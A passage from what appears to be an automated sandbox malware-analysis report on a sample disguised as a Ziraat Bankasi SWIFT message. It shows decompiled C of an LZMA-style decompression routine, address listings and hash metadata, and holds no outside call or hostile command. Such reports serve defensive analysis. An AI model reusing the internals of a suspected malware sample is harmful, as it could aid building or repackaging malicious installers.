                                  												 *(__ebp - 0x40) = __ecx;
                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  												goto L108;
                                  											case 0x1a:
                                  												L56:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1a;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x68);
                                  												__al =  *(__ebp - 0x5c);
                                  												__edx =  *(__ebp - 8);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *( *(__ebp - 0x68)) = __al;
                                  												__ecx =  *(__ebp - 0x14);
                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                  												__eax = __ecx + 1;
                                  												__edx = 0;
                                  												_t192 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t192;
                                  												goto L79;
                                  											case 0x1b:
                                  												L75:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1b;
                                  													goto L170;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t274 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t274;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												_t283 = __ebp - 0x64;
                                  												 *_t283 =  *(__ebp - 0x64) - 1;
                                  												__eflags =  *_t283;
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												L79:
                                  												 *(__ebp - 0x14) = __edx;
                                  												goto L80;
                                  											case 0x1c:
                                  												while(1) {
                                  													L123:
                                  													__eflags =  *(__ebp - 0x64);
                                  													if( *(__ebp - 0x64) == 0) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__edx =  *(__ebp - 8);
                                  													__cl =  *(__eax + __edx);
                                  													__eax =  *(__ebp - 0x14);
                                  													 *(__ebp - 0x5c) = __cl;
                                  													 *(__eax + __edx) = __cl;
                                  													__eax = __eax + 1;
                                  													__edx = 0;
                                  													_t414 = __eax %  *(__ebp - 0x74);
                                  													__eax = __eax /  *(__ebp - 0x74);
                                  													__edx = _t414;
                                  													__eax =  *(__ebp - 0x68);
                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  													__eflags =  *(__ebp - 0x30);
                                  													 *( *(__ebp - 0x68)) = __cl;
                                  													 *(__ebp - 0x14) = _t414;
                                  													if( *(__ebp - 0x30) > 0) {
                                  														continue;
                                  													} else {
                                  														L80:
                                  														 *(__ebp - 0x88) = 2;
                                  														goto L1;
                                  													}
                                  												}
                                  												 *(__ebp - 0x88) = 0x1c;
                                  												goto L170;
                                  										}
                                  									}
                                  									L171:
                                  									_t544 = _t543 | 0xffffffff;
                                  									goto L172;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L1;
                                  				}
                                  			}














                                  0x00000000
                                  0x004062eb
                                  0x004062eb
                                  0x004062ef
                                  0x00406310
                                  0x00406317
                                  0x0040631d
                                  0x00406323
                                  0x00406335
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x004062f1
                                  0x004062f7
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x004066bb
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x004068d2
                                  0x004068da
                                  0x004068e1
                                  0x004068e3
                                  0x004068ea
                                  0x004068ee
                                  0x004068ee
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x0040672b
                                  0x0040672e
                                  0x0040672e
                                  0x00406734
                                  0x00406734
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x0040609e
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x004060b5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00406734
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x0040673a
                                  0x00406734
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000
                                  0x004068e7
                                  0x00406734
                                  0x004066bb
                                  0x004066b8
                                  0x00000000
                                  0x004062ef

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                                  • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                                  • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                                  • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406409() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						 *(_t613 - 0x84) = 0xb;
                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                  						goto L132;
                                  					} else {
                                  						__eax =  *(__ebp - 0x28);
                                  						L88:
                                  						 *(__ebp - 0x2c) = __eax;
                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  						L89:
                                  						__eax =  *(__ebp - 4);
                                  						 *(__ebp - 0x80) = 0x15;
                                  						__eax =  *(__ebp - 4) + 0xa68;
                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  						L69:
                                  						 *(__ebp - 0x84) = 0x12;
                                  						while(1) {
                                  							L132:
                                  							 *(_t613 - 0x54) = _t606;
                                  							while(1) {
                                  								L133:
                                  								_t531 =  *_t606;
                                  								_t589 = _t531 & 0x0000ffff;
                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  								if( *(_t613 - 0xc) >= _t565) {
                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  									 *(_t613 - 0x40) = 1;
                                  									_t532 = _t531 - (_t531 >> 5);
                                  									 *_t606 = _t532;
                                  								} else {
                                  									 *(_t613 - 0x10) = _t565;
                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  								}
                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                  									goto L139;
                                  								}
                                  								L137:
                                  								if( *(_t613 - 0x6c) == 0) {
                                  									 *(_t613 - 0x88) = 5;
                                  									L170:
                                  									_t568 = 0x22;
                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  									_t535 = 0;
                                  									L172:
                                  									return _t535;
                                  								}
                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  								L139:
                                  								_t533 =  *(_t613 - 0x84);
                                  								while(1) {
                                  									 *(_t613 - 0x88) = _t533;
                                  									while(1) {
                                  										L1:
                                  										_t534 =  *(_t613 - 0x88);
                                  										if(_t534 > 0x1c) {
                                  											break;
                                  										}
                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                  											case 0:
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  												_t534 =  *( *(_t613 - 0x70));
                                  												if(_t534 > 0xe1) {
                                  													goto L171;
                                  												}
                                  												_t538 = _t534 & 0x000000ff;
                                  												_push(0x2d);
                                  												asm("cdq");
                                  												_pop(_t570);
                                  												_push(9);
                                  												_pop(_t571);
                                  												_t609 = _t538 / _t570;
                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                  												asm("cdq");
                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                  												 *(_t613 - 0x3c) = _t604;
                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  													L10:
                                  													if(_t612 == 0) {
                                  														L12:
                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  														goto L15;
                                  													} else {
                                  														goto L11;
                                  													}
                                  													do {
                                  														L11:
                                  														_t612 = _t612 - 1;
                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  													} while (_t612 != 0);
                                  													goto L12;
                                  												}
                                  												if( *(_t613 - 4) != 0) {
                                  													GlobalFree( *(_t613 - 4));
                                  												}
                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  												 *(_t613 - 4) = _t534;
                                  												if(_t534 == 0) {
                                  													goto L171;
                                  												} else {
                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  													goto L10;
                                  												}
                                  											case 1:
                                  												L13:
                                  												__eflags =  *(_t613 - 0x6c);
                                  												if( *(_t613 - 0x6c) == 0) {
                                  													 *(_t613 - 0x88) = 1;
                                  													goto L170;
                                  												}
                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  												_t45 = _t613 - 0x48;
                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                  												__eflags =  *_t45;
                                  												L15:
                                  												if( *(_t613 - 0x48) < 4) {
                                  													goto L13;
                                  												}
                                  												_t546 =  *(_t613 - 0x40);
                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                  													L20:
                                  													 *(_t613 - 0x48) = 5;
                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  													goto L23;
                                  												}
                                  												 *(_t613 - 0x74) = _t546;
                                  												if( *(_t613 - 8) != 0) {
                                  													GlobalFree( *(_t613 - 8));
                                  												}
